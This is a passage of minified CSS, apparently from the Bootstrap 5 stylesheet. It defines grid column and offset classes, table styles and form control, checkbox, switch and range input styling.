(min-width:1200px){.display-5{font-size:3rem}}.display-6{font-size:calc(1.375rem + 1.5vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-6{font-size:2.5rem}}.list-unstyled{padding-left:0;list-style:none}.list-inline{padding-left:0;list-style:none}.list-inline-item{display:inline-block}.list-inline-item:not(:last-child){margin-right:.5rem}.initialism{font-size:.875em;text-transform:uppercase}.blockquote{margin-bottom:1rem;font-size:1.25rem}.blockquote>:last-child{margin-bottom:0}.blockquote-footer{margin-top:-1rem;margin-bottom:1rem;font-size:.875em;color:#6c757d}.blockquote-footer::before{content:"— "}.img-fluid{max-width:100%;height:auto}.img-thumbnail{padding:.25rem;background-color:#fff;border:1px solid var(--bs-border-color);border-radius:.375rem;max-width:100%;height:auto}.figure{display:inline-block}.figure-img{margin-bottom:.5rem;line-height:1}.figure-caption{font-size:.875em;color:#6c757d}.container,.container-fluid,.container-lg,.container-md,.container-sm,.container-xl,.container-xxl{--bs-gutter-x:1.5rem;--bs-gutter-y:0;width:100%;padding-right:calc(var(--bs-gutter-x) * .5);padding-left:calc(var(--bs-gutter-x) * .5);margin-right:auto;margin-left:auto}@media (min-width:576px){.container,.container-sm{max-width:540px}}@media (min-width:768px){.container,.container-md,.container-sm{max-width:720px}}@media (min-width:992px){.container,.container-lg,.container-md,.container-sm{max-width:960px}}@media (min-width:1200px){.container,.container-lg,.container-md,.container-sm,.container-xl{max-width:1140px}}@media (min-width:1400px){.container,.container-lg,.container-md,.container-sm,.container-xl,.container-xxl{max-width:1320px}}.row{--bs-gutter-x:1.5rem;--bs-gutter-y:0;display:flex;flex-wrap:wrap;margin-top:calc(-1 * var(--bs-gutter-y));margin-right:calc(-.5 * var(--bs-gutter-x));margin-left:calc(-.5 * var(--bs-gutter-x))}.row>*{flex-shrink:0;width:100%;max-width:100%;padding-right:calc(var(--bs-gutter-x) * .5);padding-left:calc(var(--bs-gutter-x) * .5);margin-top:var(--bs-gutter-y)}.col{flex:1 0 0%}.row-cols-auto>*{flex:0 0 auto;width:auto}.row-cols-1>*{flex:0 0 auto;width:100%}.row-cols-2>*{flex:0 0 auto;width:50%}.row-cols-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-4>*{flex:0 0 auto;width:25%}.row-cols-5>*{flex:0 0 auto;width:20%}.row-cols-6>*{flex:0 0 auto;width:16.6666666667%}.col-auto{flex:0 0 auto;width:auto}.col-1{flex:0 0 auto;width:8.33333333%}.col-2{flex:0 0 auto;width:16.66666667%}.col-3{flex:0 0 auto;width:25%}.col-4{flex:0 0 auto;width:33.33333333%}.col-5{flex:0 0 auto;width:41.66666667%}.col-6{flex:0 0 auto;width:50%}.col-7{flex:0 0 auto;width:58.33333333%}.col-8{flex:0 0 auto;width:66.66666667%}.col-9{flex:0 0 auto;width:75%}.col-10{flex:0 0 auto;width:83.33333333%}.col-11{flex:0 0 auto;width:91.66666667%}.col-12{flex:0 0 auto;width:100%}.offset-1{margin-left:8.33333333%}.offset-2{margin-left:16.66666667%}.offset-3{margin-left:25%}.offset-4{margin-left:33.33333333%}.offset-5{margin-left:41.66666667%}.offset-6{margin-left:50%}.offset-7{margin-left:58.33333333%}.offset-8{margin-left:66.66666667%}.offset-9{margin-left:75%}.offset-10{margin-left:83.33333333%}.offset-11{margin-left:91.66666667%}.g-0,.gx-0{--bs-gutter-x:0}.g-0,.gy-0{--bs-gutter-y:0}.g-1,.gx-1{--bs-gutter-x:0.25rem}.g-1,.gy-1{--bs-gutter-y:0.25rem}.g-2,.gx-2{--bs-gutter-x:0.5rem}.g-2,.gy-2{--bs-gutter-y:0.5rem}.g-3,.gx-3{--bs-gutter-x:1rem}.g-3,.gy-3{--bs-gutter-y:1rem}.g-4,.gx-4{--bs-gutter-x:1.5rem}.g-4,.gy-4{--bs-gutter-y:1.5rem}.g-5,.gx-5{--bs-gutter-x:3rem}.g-5,.gy-5{--bs-gutter-y:3rem}@media (min-width:576px){.col-sm{flex:1 0 0%}.row-cols-sm-auto>*{flex:0 0 auto;width:auto}.row-cols-sm-1>*{flex:0 0 auto;width:100%}.row-cols-sm-2>*{flex:0 0 auto;width:50%}.row-cols-sm-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-sm-4>*{flex:0 0 auto;width:25%}.row-cols-sm-5>*{flex:0 0 auto;width:20%}.row-cols-sm-6>*{flex:0 0 auto;width:16.6666666667%}.col-sm-auto{flex:0 0 auto;width:auto}.col-sm-1{flex:0 0 auto;width:8.33333333%}.col-sm-2{flex:0 0 auto;width:16.66666667%}.col-sm-3{flex:0 0 auto;width:25%}.col-sm-4{flex:0 0 auto;width:33.33333333%}.col-sm-5{flex:0 0 auto;width:41.66666667%}.col-sm-6{flex:0 0 auto;width:50%}.col-sm-7{flex:0 0 auto;width:58.33333333%}.col-sm-8{flex:0 0 auto;width:66.66666667%}.col-sm-9{flex:0 0 auto;width:75%}.col-sm-10{flex:0 0 auto;width:83.33333333%}.col-sm-11{flex:0 0 auto;width:91.66666667%}.col-sm-12{flex:0 0 auto;width:100%}.offset-sm-0{margin-left:0}.offset-sm-1{margin-left:8.33333333%}.offset-sm-2{margin-left:16.66666667%}.offset-sm-3{margin-left:25%}.offset-sm-4{margin-left:33.33333333%}.offset-sm-5{margin-left:41.66666667%}.offset-sm-6{margin-left:50%}.offset-sm-7{margin-left:58.33333333%}.offset-sm-8{margin-left:66.66666667%}.offset-sm-9{margin-left:75%}.offset-sm-10{margin-left:83.33333333%}.offset-sm-11{margin-left:91.66666667%}.g-sm-0,.gx-sm-0{--bs-gutter-x:0}.g-sm-0,.gy-sm-0{--bs-gutter-y:0}.g-sm-1,.gx-sm-1{--bs-gutter-x:0.25rem}.g-sm-1,.gy-sm-1{--bs-gutter-y:0.25rem}.g-sm-2,.gx-sm-2{--bs-gutter-x:0.5rem}.g-sm-2,.gy-sm-2{--bs-gutter-y:0.5rem}.g-sm-3,.gx-sm-3{--bs-gutter-x:1rem}.g-sm-3,.gy-sm-3{--bs-gutter-y:1rem}.g-sm-4,.gx-sm-4{--bs-gutter-x:1.5rem}.g-sm-4,.gy-sm-4{--bs-gutter-y:1.5rem}.g-sm-5,.gx-sm-5{--bs-gutter-x:3rem}.g-sm-5,.gy-sm-5{--bs-gutter-y:3rem}}@media (min-width:768px){.col-md{flex:1 0 0%}.row-cols-md-auto>*{flex:0 0 auto;width:auto}.row-cols-md-1>*{flex:0 0 auto;width:100%}.row-cols-md-2>*{flex:0 0 auto;width:50%}.row-cols-md-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-md-4>*{flex:0 0 auto;width:25%}.row-cols-md-5>*{flex:0 0 auto;width:20%}.row-cols-md-6>*{flex:0 0 auto;width:16.6666666667%}.col-md-auto{flex:0 0 auto;width:auto}.col-md-1{flex:0 0 auto;width:8.33333333%}.col-md-2{flex:0 0 auto;width:16.66666667%}.col-md-3{flex:0 0 auto;width:25%}.col-md-4{flex:0 0 auto;width:33.33333333%}.col-md-5{flex:0 0 auto;width:41.66666667%}.col-md-6{flex:0 0 auto;width:50%}.col-md-7{flex:0 0 auto;width:58.33333333%}.col-md-8{flex:0 0 auto;width:66.66666667%}.col-md-9{flex:0 0 auto;width:75%}.col-md-10{flex:0 0 auto;width:83.33333333%}.col-md-11{flex:0 0 auto;width:91.66666667%}.col-md-12{flex:0 0 auto;width:100%}.offset-md-0{margin-left:0}.offset-md-1{margin-left:8.33333333%}.offset-md-2{margin-left:16.66666667%}.offset-md-3{margin-left:25%}.offset-md-4{margin-left:33.33333333%}.offset-md-5{margin-left:41.66666667%}.offset-md-6{margin-left:50%}.offset-md-7{margin-left:58.33333333%}.offset-md-8{margin-left:66.66666667%}.offset-md-9{margin-left:75%}.offset-md-10{margin-left:83.33333333%}.offset-md-11{margin-left:91.66666667%}.g-md-0,.gx-md-0{--bs-gutter-x:0}.g-md-0,.gy-md-0{--bs-gutter-y:0}.g-md-1,.gx-md-1{--bs-gutter-x:0.25rem}.g-md-1,.gy-md-1{--bs-gutter-y:0.25rem}.g-md-2,.gx-md-2{--bs-gutter-x:0.5rem}.g-md-2,.gy-md-2{--bs-gutter-y:0.5rem}.g-md-3,.gx-md-3{--bs-gutter-x:1rem}.g-md-3,.gy-md-3{--bs-gutter-y:1rem}.g-md-4,.gx-md-4{--bs-gutter-x:1.5rem}.g-md-4,.gy-md-4{--bs-gutter-y:1.5rem}.g-md-5,.gx-md-5{--bs-gutter-x:3rem}.g-md-5,.gy-md-5{--bs-gutter-y:3rem}}@media (min-width:992px){.col-lg{flex:1 0 0%}.row-cols-lg-auto>*{flex:0 0 auto;width:auto}.row-cols-lg-1>*{flex:0 0 auto;width:100%}.row-cols-lg-2>*{flex:0 0 auto;width:50%}.row-cols-lg-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-lg-4>*{flex:0 0 auto;width:25%}.row-cols-lg-5>*{flex:0 0 auto;width:20%}.row-cols-lg-6>*{flex:0 0 auto;width:16.6666666667%}.col-lg-auto{flex:0 0 auto;width:auto}.col-lg-1{flex:0 0 auto;width:8.33333333%}.col-lg-2{flex:0 0 auto;width:16.66666667%}.col-lg-3{flex:0 0 auto;width:25%}.col-lg-4{flex:0 0 auto;width:33.33333333%}.col-lg-5{flex:0 0 auto;width:41.66666667%}.col-lg-6{flex:0 0 auto;width:50%}.col-lg-7{flex:0 0 auto;width:58.33333333%}.col-lg-8{flex:0 0 auto;width:66.66666667%}.col-lg-9{flex:0 0 auto;width:75%}.col-lg-10{flex:0 0 auto;width:83.33333333%}.col-lg-11{flex:0 0 auto;width:91.66666667%}.col-lg-12{flex:0 0 auto;width:100%}.offset-lg-0{margin-left:0}.offset-lg-1{margin-left:8.33333333%}.offset-lg-2{margin-left:16.66666667%}.offset-lg-3{margin-left:25%}.offset-lg-4{margin-left:33.33333333%}.offset-lg-5{margin-left:41.66666667%}.offset-lg-6{margin-left:50%}.offset-lg-7{margin-left:58.33333333%}.offset-lg-8{margin-left:66.66666667%}.offset-lg-9{margin-left:75%}.offset-lg-10{margin-left:83.33333333%}.offset-lg-11{margin-left:91.66666667%}.g-lg-0,.gx-lg-0{--bs-gutter-x:0}.g-lg-0,.gy-lg-0{--bs-gutter-y:0}.g-lg-1,.gx-lg-1{--bs-gutter-x:0.25rem}.g-lg-1,.gy-lg-1{--bs-gutter-y:0.25rem}.g-lg-2,.gx-lg-2{--bs-gutter-x:0.5rem}.g-lg-2,.gy-lg-2{--bs-gutter-y:0.5rem}.g-lg-3,.gx-lg-3{--bs-gutter-x:1rem}.g-lg-3,.gy-lg-3{--bs-gutter-y:1rem}.g-lg-4,.gx-lg-4{--bs-gutter-x:1.5rem}.g-lg-4,.gy-lg-4{--bs-gutter-y:1.5rem}.g-lg-5,.gx-lg-5{--bs-gutter-x:3rem}.g-lg-5,.gy-lg-5{--bs-gutter-y:3rem}}@media (min-width:1200px){.col-xl{flex:1 0 0%}.row-cols-xl-auto>*{flex:0 0 auto;width:auto}.row-cols-xl-1>*{flex:0 0 auto;width:100%}.row-cols-xl-2>*{flex:0 0 auto;width:50%}.row-cols-xl-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-xl-4>*{flex:0 0 auto;width:25%}.row-cols-xl-5>*{flex:0 0 auto;width:20%}.row-cols-xl-6>*{flex:0 0 auto;width:16.6666666667%}.col-xl-auto{flex:0 0 auto;width:auto}.col-xl-1{flex:0 0 auto;width:8.33333333%}.col-xl-2{flex:0 0 auto;width:16.66666667%}.col-xl-3{flex:0 0 auto;width:25%}.col-xl-4{flex:0 0 auto;width:33.33333333%}.col-xl-5{flex:0 0 auto;width:41.66666667%}.col-xl-6{flex:0 0 auto;width:50%}.col-xl-7{flex:0 0 auto;width:58.33333333%}.col-xl-8{flex:0 0 auto;width:66.66666667%}.col-xl-9{flex:0 0 auto;width:75%}.col-xl-10{flex:0 0 auto;width:83.33333333%}.col-xl-11{flex:0 0 auto;width:91.66666667%}.col-xl-12{flex:0 0 auto;width:100%}.offset-xl-0{margin-left:0}.offset-xl-1{margin-left:8.33333333%}.offset-xl-2{margin-left:16.66666667%}.offset-xl-3{margin-left:25%}.offset-xl-4{margin-left:33.33333333%}.offset-xl-5{margin-left:41.66666667%}.offset-xl-6{margin-left:50%}.offset-xl-7{margin-left:58.33333333%}.offset-xl-8{margin-left:66.66666667%}.offset-xl-9{margin-left:75%}.offset-xl-10{margin-left:83.33333333%}.offset-xl-11{margin-left:91.66666667%}.g-xl-0,.gx-xl-0{--bs-gutter-x:0}.g-xl-0,.gy-xl-0{--bs-gutter-y:0}.g-xl-1,.gx-xl-1{--bs-gutter-x:0.25rem}.g-xl-1,.gy-xl-1{--bs-gutter-y:0.25rem}.g-xl-2,.gx-xl-2{--bs-gutter-x:0.5rem}.g-xl-2,.gy-xl-2{--bs-gutter-y:0.5rem}.g-xl-3,.gx-xl-3{--bs-gutter-x:1rem}.g-xl-3,.gy-xl-3{--bs-gutter-y:1rem}.g-xl-4,.gx-xl-4{--bs-gutter-x:1.5rem}.g-xl-4,.gy-xl-4{--bs-gutter-y:1.5rem}.g-xl-5,.gx-xl-5{--bs-gutter-x:3rem}.g-xl-5,.gy-xl-5{--bs-gutter-y:3rem}}@media (min-width:1400px){.col-xxl{flex:1 0 0%}.row-cols-xxl-auto>*{flex:0 0 auto;width:auto}.row-cols-xxl-1>*{flex:0 0 auto;width:100%}.row-cols-xxl-2>*{flex:0 0 auto;width:50%}.row-cols-xxl-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-xxl-4>*{flex:0 0 auto;width:25%}.row-cols-xxl-5>*{flex:0 0 auto;width:20%}.row-cols-xxl-6>*{flex:0 0 auto;width:16.6666666667%}.col-xxl-auto{flex:0 0 auto;width:auto}.col-xxl-1{flex:0 0 auto;width:8.33333333%}.col-xxl-2{flex:0 0 auto;width:16.66666667%}.col-xxl-3{flex:0 0 auto;width:25%}.col-xxl-4{flex:0 0 auto;width:33.33333333%}.col-xxl-5{flex:0 0 auto;width:41.66666667%}.col-xxl-6{flex:0 0 auto;width:50%}.col-xxl-7{flex:0 0 auto;width:58.33333333%}.col-xxl-8{flex:0 0 auto;width:66.66666667%}.col-xxl-9{flex:0 0 auto;width:75%}.col-xxl-10{flex:0 0 auto;width:83.33333333%}.col-xxl-11{flex:0 0 auto;width:91.66666667%}.col-xxl-12{flex:0 0 auto;width:100%}.offset-xxl-0{margin-left:0}.offset-xxl-1{margin-left:8.33333333%}.offset-xxl-2{margin-left:16.66666667%}.offset-xxl-3{margin-left:25%}.offset-xxl-4{margin-left:33.33333333%}.offset-xxl-5{margin-left:41.66666667%}.offset-xxl-6{margin-left:50%}.offset-xxl-7{margin-left:58.33333333%}.offset-xxl-8{margin-left:66.66666667%}.offset-xxl-9{margin-left:75%}.offset-xxl-10{margin-left:83.33333333%}.offset-xxl-11{margin-left:91.66666667%}.g-xxl-0,.gx-xxl-0{--bs-gutter-x:0}.g-xxl-0,.gy-xxl-0{--bs-gutter-y:0}.g-xxl-1,.gx-xxl-1{--bs-gutter-x:0.25rem}.g-xxl-1,.gy-xxl-1{--bs-gutter-y:0.25rem}.g-xxl-2,.gx-xxl-2{--bs-gutter-x:0.5rem}.g-xxl-2,.gy-xxl-2{--bs-gutter-y:0.5rem}.g-xxl-3,.gx-xxl-3{--bs-gutter-x:1rem}.g-xxl-3,.gy-xxl-3{--bs-gutter-y:1rem}.g-xxl-4,.gx-xxl-4{--bs-gutter-x:1.5rem}.g-xxl-4,.gy-xxl-4{--bs-gutter-y:1.5rem}.g-xxl-5,.gx-xxl-5{--bs-gutter-x:3rem}.g-xxl-5,.gy-xxl-5{--bs-gutter-y:3rem}}.table{--bs-table-color:var(--bs-body-color);--bs-table-bg:transparent;--bs-table-border-color:var(--bs-border-color);--bs-table-accent-bg:transparent;--bs-table-striped-color:var(--bs-body-color);--bs-table-striped-bg:rgba(0, 0, 0, 0.05);--bs-table-active-color:var(--bs-body-color);--bs-table-active-bg:rgba(0, 0, 0, 0.1);--bs-table-hover-color:var(--bs-body-color);--bs-table-hover-bg:rgba(0, 0, 0, 0.075);width:100%;margin-bottom:1rem;color:var(--bs-table-color);vertical-align:top;border-color:var(--bs-table-border-color)}.table>:not(caption)>*>*{padding:.5rem .5rem;background-color:var(--bs-table-bg);border-bottom-width:1px;box-shadow:inset 0 0 0 9999px var(--bs-table-accent-bg)}.table>tbody{vertical-align:inherit}.table>thead{vertical-align:bottom}.table-group-divider{border-top:2px solid currentcolor}.caption-top{caption-side:top}.table-sm>:not(caption)>*>*{padding:.25rem .25rem}.table-bordered>:not(caption)>*{border-width:1px 0}.table-bordered>:not(caption)>*>*{border-width:0 1px}.table-borderless>:not(caption)>*>*{border-bottom-width:0}.table-borderless>:not(:first-child){border-top-width:0}.table-striped>tbody>tr:nth-of-type(odd)>*{--bs-table-accent-bg:var(--bs-table-striped-bg);color:var(--bs-table-striped-color)}.table-striped-columns>:not(caption)>tr>:nth-child(2n){--bs-table-accent-bg:var(--bs-table-striped-bg);color:var(--bs-table-striped-color)}.table-active{--bs-table-accent-bg:var(--bs-table-active-bg);color:var(--bs-table-active-color)}.table-hover>tbody>tr:hover>*{--bs-table-accent-bg:var(--bs-table-hover-bg);color:var(--bs-table-hover-color)}.table-primary{--bs-table-color:#000;--bs-table-bg:#cfe2ff;--bs-table-border-color:#bacbe6;--bs-table-striped-bg:#c5d7f2;--bs-table-striped-color:#000;--bs-table-active-bg:#bacbe6;--bs-table-active-color:#000;--bs-table-hover-bg:#bfd1ec;--bs-table-hover-color:#000;color:var(--bs-table-color);border-color:var(--bs-table-border-color)}.table-secondary{--bs-table-color:#000;--bs-table-bg:#e2e3e5;--bs-table-border-color:#cbccce;--bs-table-striped-bg:#d7d8da;--bs-table-striped-color:#000;--bs-table-active-bg:#cbccce;--bs-table-active-color:#000;--bs-table-hover-bg:#d1d2d4;--bs-table-hover-color:#000;color:var(--bs-table-color);border-color:var(--bs-table-border-color)}.table-success{--bs-table-color:#000;--bs-table-bg:#d1e7dd;--bs-table-border-color:#bcd0c7;--bs-table-striped-bg:#c7dbd2;--bs-table-striped-color:#000;--bs-table-active-bg:#bcd0c7;--bs-table-active-color:#000;--bs-table-hover-bg:#c1d6cc;--bs-table-hover-color:#000;color:var(--bs-table-color);border-color:var(--bs-table-border-color)}.table-info{--bs-table-color:#000;--bs-table-bg:#cff4fc;--bs-table-border-color:#badce3;--bs-table-striped-bg:#c5e8ef;--bs-table-striped-color:#000;--bs-table-active-bg:#badce3;--bs-table-active-color:#000;--bs-table-hover-bg:#bfe2e9;--bs-table-hover-color:#000;color:var(--bs-table-color);border-color:var(--bs-table-border-color)}.table-warning{--bs-table-color:#000;--bs-table-bg:#fff3cd;--bs-table-border-color:#e6dbb9;--bs-table-striped-bg:#f2e7c3;--bs-table-striped-color:#000;--bs-table-active-bg:#e6dbb9;--bs-table-active-color:#000;--bs-table-hover-bg:#ece1be;--bs-table-hover-color:#000;color:var(--bs-table-color);border-color:var(--bs-table-border-color)}.table-danger{--bs-table-color:#000;--bs-table-bg:#f8d7da;--bs-table-border-color:#dfc2c4;--bs-table-striped-bg:#eccccf;--bs-table-striped-color:#000;--bs-table-active-bg:#dfc2c4;--bs-table-active-color:#000;--bs-table-hover-bg:#e5c7ca;--bs-table-hover-color:#000;color:var(--bs-table-color);border-color:var(--bs-table-border-color)}.table-light{--bs-table-color:#000;--bs-table-bg:#f8f9fa;--bs-table-border-color:#dfe0e1;--bs-table-striped-bg:#ecedee;--bs-table-striped-color:#000;--bs-table-active-bg:#dfe0e1;--bs-table-active-color:#000;--bs-table-hover-bg:#e5e6e7;--bs-table-hover-color:#000;color:var(--bs-table-color);border-color:var(--bs-table-border-color)}.table-dark{--bs-table-color:#fff;--bs-table-bg:#212529;--bs-table-border-color:#373b3e;--bs-table-striped-bg:#2c3034;--bs-table-striped-color:#fff;--bs-table-active-bg:#373b3e;--bs-table-active-color:#fff;--bs-table-hover-bg:#323539;--bs-table-hover-color:#fff;color:var(--bs-table-color);border-color:var(--bs-table-border-color)}.table-responsive{overflow-x:auto;-webkit-overflow-scrolling:touch}@media (max-width:575.98px){.table-responsive-sm{overflow-x:auto;-webkit-overflow-scrolling:touch}}@media (max-width:767.98px){.table-responsive-md{overflow-x:auto;-webkit-overflow-scrolling:touch}}@media (max-width:991.98px){.table-responsive-lg{overflow-x:auto;-webkit-overflow-scrolling:touch}}@media (max-width:1199.98px){.table-responsive-xl{overflow-x:auto;-webkit-overflow-scrolling:touch}}@media (max-width:1399.98px){.table-responsive-xxl{overflow-x:auto;-webkit-overflow-scrolling:touch}}.form-label{margin-bottom:.5rem}.col-form-label{padding-top:calc(.375rem + 1px);padding-bottom:calc(.375rem + 1px);margin-bottom:0;font-size:inherit;line-height:1.5}.col-form-label-lg{padding-top:calc(.5rem + 1px);padding-bottom:calc(.5rem + 1px);font-size:1.25rem}.col-form-label-sm{padding-top:calc(.25rem + 1px);padding-bottom:calc(.25rem + 1px);font-size:.875rem}.form-text{margin-top:.25rem;font-size:.875em;color:#6c757d}.form-control{display:block;width:100%;padding:.375rem .75rem;font-size:1rem;font-weight:400;line-height:1.5;color:#212529;background-color:#fff;background-clip:padding-box;border:1px solid #ced4da;-webkit-appearance:none;-moz-appearance:none;appearance:none;border-radius:.375rem;transition:border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.form-control{transition:none}}.form-control[type=file]{overflow:hidden}.form-control[type=file]:not(:disabled):not([readonly]){cursor:pointer}.form-control:focus{color:#212529;background-color:#fff;border-color:#86b7fe;outline:0;box-shadow:0 0 0 .25rem rgba(13,110,253,.25)}.form-control::-webkit-date-and-time-value{height:1.5em}.form-control::-moz-placeholder{color:#6c757d;opacity:1}.form-control::placeholder{color:#6c757d;opacity:1}.form-control:disabled{background-color:#e9ecef;opacity:1}.form-control::-webkit-file-upload-button{padding:.375rem .75rem;margin:-.375rem -.75rem;-webkit-margin-end:.75rem;margin-inline-end:.75rem;color:#212529;background-color:#e9ecef;pointer-events:none;border-color:inherit;border-style:solid;border-width:0;border-inline-end-width:1px;border-radius:0;-webkit-transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out}.form-control::file-selector-button{padding:.375rem .75rem;margin:-.375rem -.75rem;-webkit-margin-end:.75rem;margin-inline-end:.75rem;color:#212529;background-color:#e9ecef;pointer-events:none;border-color:inherit;border-style:solid;border-width:0;border-inline-end-width:1px;border-radius:0;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.form-control::-webkit-file-upload-button{-webkit-transition:none;transition:none}.form-control::file-selector-button{transition:none}}.form-control:hover:not(:disabled):not([readonly])::-webkit-file-upload-button{background-color:#dde0e3}.form-control:hover:not(:disabled):not([readonly])::file-selector-button{background-color:#dde0e3}.form-control-plaintext{display:block;width:100%;padding:.375rem 0;margin-bottom:0;line-height:1.5;color:#212529;background-color:transparent;border:solid transparent;border-width:1px 0}.form-control-plaintext:focus{outline:0}.form-control-plaintext.form-control-lg,.form-control-plaintext.form-control-sm{padding-right:0;padding-left:0}.form-control-sm{min-height:calc(1.5em + .5rem + 2px);padding:.25rem .5rem;font-size:.875rem;border-radius:.25rem}.form-control-sm::-webkit-file-upload-button{padding:.25rem .5rem;margin:-.25rem -.5rem;-webkit-margin-end:.5rem;margin-inline-end:.5rem}.form-control-sm::file-selector-button{padding:.25rem .5rem;margin:-.25rem -.5rem;-webkit-margin-end:.5rem;margin-inline-end:.5rem}.form-control-lg{min-height:calc(1.5em + 1rem + 2px);padding:.5rem 1rem;font-size:1.25rem;border-radius:.5rem}.form-control-lg::-webkit-file-upload-button{padding:.5rem 1rem;margin:-.5rem -1rem;-webkit-margin-end:1rem;margin-inline-end:1rem}.form-control-lg::file-selector-button{padding:.5rem 1rem;margin:-.5rem -1rem;-webkit-margin-end:1rem;margin-inline-end:1rem}textarea.form-control{min-height:calc(1.5em + .75rem + 2px)}textarea.form-control-sm{min-height:calc(1.5em + .5rem + 2px)}textarea.form-control-lg{min-height:calc(1.5em + 1rem + 2px)}.form-control-color{width:3rem;height:calc(1.5em + .75rem + 2px);padding:.375rem}.form-control-color:not(:disabled):not([readonly]){cursor:pointer}.form-control-color::-moz-color-swatch{border:0!important;border-radius:.375rem}.form-control-color::-webkit-color-swatch{border-radius:.375rem}.form-control-color.form-control-sm{height:calc(1.5em + .5rem + 2px)}.form-control-color.form-control-lg{height:calc(1.5em + 1rem + 2px)}.form-select{display:block;width:100%;padding:.375rem 2.25rem .375rem .75rem;-moz-padding-start:calc(0.75rem - 3px);font-size:1rem;font-weight:400;line-height:1.5;color:#212529;background-color:#fff;background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16'%3e%3cpath fill='none' stroke='%23343a40' stroke-linecap='round' stroke-linejoin='round' stroke-width='2' d='m2 5 6 6 6-6'/%3e%3c/svg%3e");background-repeat:no-repeat;background-position:right .75rem center;background-size:16px 12px;border:1px solid #ced4da;border-radius:.375rem;transition:border-color .15s ease-in-out,box-shadow .15s ease-in-out;-webkit-appearance:none;-moz-appearance:none;appearance:none}@media (prefers-reduced-motion:reduce){.form-select{transition:none}}.form-select:focus{border-color:#86b7fe;outline:0;box-shadow:0 0 0 .25rem rgba(13,110,253,.25)}.form-select[multiple],.form-select[size]:not([size="1"]){padding-right:.75rem;background-image:none}.form-select:disabled{background-color:#e9ecef}.form-select:-moz-focusring{color:transparent;text-shadow:0 0 0 #212529}.form-select-sm{padding-top:.25rem;padding-bottom:.25rem;padding-left:.5rem;font-size:.875rem;border-radius:.25rem}.form-select-lg{padding-top:.5rem;padding-bottom:.5rem;padding-left:1rem;font-size:1.25rem;border-radius:.5rem}.form-check{display:block;min-height:1.5rem;padding-left:1.5em;margin-bottom:.125rem}.form-check .form-check-input{float:left;margin-left:-1.5em}.form-check-reverse{padding-right:1.5em;padding-left:0;text-align:right}.form-check-reverse .form-check-input{float:right;margin-right:-1.5em;margin-left:0}.form-check-input{width:1em;height:1em;margin-top:.25em;vertical-align:top;background-color:#fff;background-repeat:no-repeat;background-position:center;background-size:contain;border:1px solid rgba(0,0,0,.25);-webkit-appearance:none;-moz-appearance:none;appearance:none;-webkit-print-color-adjust:exact;color-adjust:exact;print-color-adjust:exact}.form-check-input[type=checkbox]{border-radius:.25em}.form-check-input[type=radio]{border-radius:50%}.form-check-input:active{filter:brightness(90%)}.form-check-input:focus{border-color:#86b7fe;outline:0;box-shadow:0 0 0 .25rem rgba(13,110,253,.25)}.form-check-input:checked{background-color:#0d6efd;border-color:#0d6efd}.form-check-input:checked[type=checkbox]{background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 20 20'%3e%3cpath fill='none' stroke='%23fff' stroke-linecap='round' stroke-linejoin='round' stroke-width='3' d='m6 10 3 3 6-6'/%3e%3c/svg%3e")}.form-check-input:checked[type=radio]{background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3e%3ccircle r='2' fill='%23fff'/%3e%3c/svg%3e")}.form-check-input[type=checkbox]:indeterminate{background-color:#0d6efd;border-color:#0d6efd;background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 20 20'%3e%3cpath fill='none' stroke='%23fff' stroke-linecap='round' stroke-linejoin='round' stroke-width='3' d='M6 10h8'/%3e%3c/svg%3e")}.form-check-input:disabled{pointer-events:none;filter:none;opacity:.5}.form-check-input:disabled~.form-check-label,.form-check-input[disabled]~.form-check-label{cursor:default;opacity:.5}.form-switch{padding-left:2.5em}.form-switch .form-check-input{width:2em;margin-left:-2.5em;background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3e%3ccircle r='3' fill='rgba%280, 0, 0, 0.25%29'/%3e%3c/svg%3e");background-position:left center;border-radius:2em;transition:background-position .15s ease-in-out}@media (prefers-reduced-motion:reduce){.form-switch .form-check-input{transition:none}}.form-switch .form-check-input:focus{background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3e%3ccircle r='3' fill='%2386b7fe'/%3e%3c/svg%3e")}.form-switch .form-check-input:checked{background-position:right center;background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3e%3ccircle r='3' fill='%23fff'/%3e%3c/svg%3e")}.form-switch.form-check-reverse{padding-right:2.5em;padding-left:0}.form-switch.form-check-reverse .form-check-input{margin-right:-2.5em;margin-left:0}.form-check-inline{display:inline-block;margin-right:1rem}.btn-check{position:absolute;clip:rect(0,0,0,0);pointer-events:none}.btn-check:disabled+.btn,.btn-check[disabled]+.btn{pointer-events:none;filter:none;opacity:.65}.form-range{width:100%;height:1.5rem;padding:0;background-color:transparent;-webkit-appearance:none;-moz-appearance:none;appearance:none}.form-range:focus{outline:0}.form-range:focus::-webkit-slider-thumb{box-shadow:0 0 0 1px #fff,0 0 0 .25rem rgba(13,110,253,.25)}.form-range:focus::-moz-range-thumb{box-shadow:0 0 0 1px #fff,0 0 0 .25rem rgba(13,110,253,.25)}.form-range::-moz-focus-outer{border:0}.form-range::-webkit-slider-thumb{width:1rem;height:1rem;margin-top:-.25rem;background-color:#0d6efd;border:0;border-radius:1rem;-webkit-transition:background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;transition:background-color .15s ease-in-out,border-color .15s 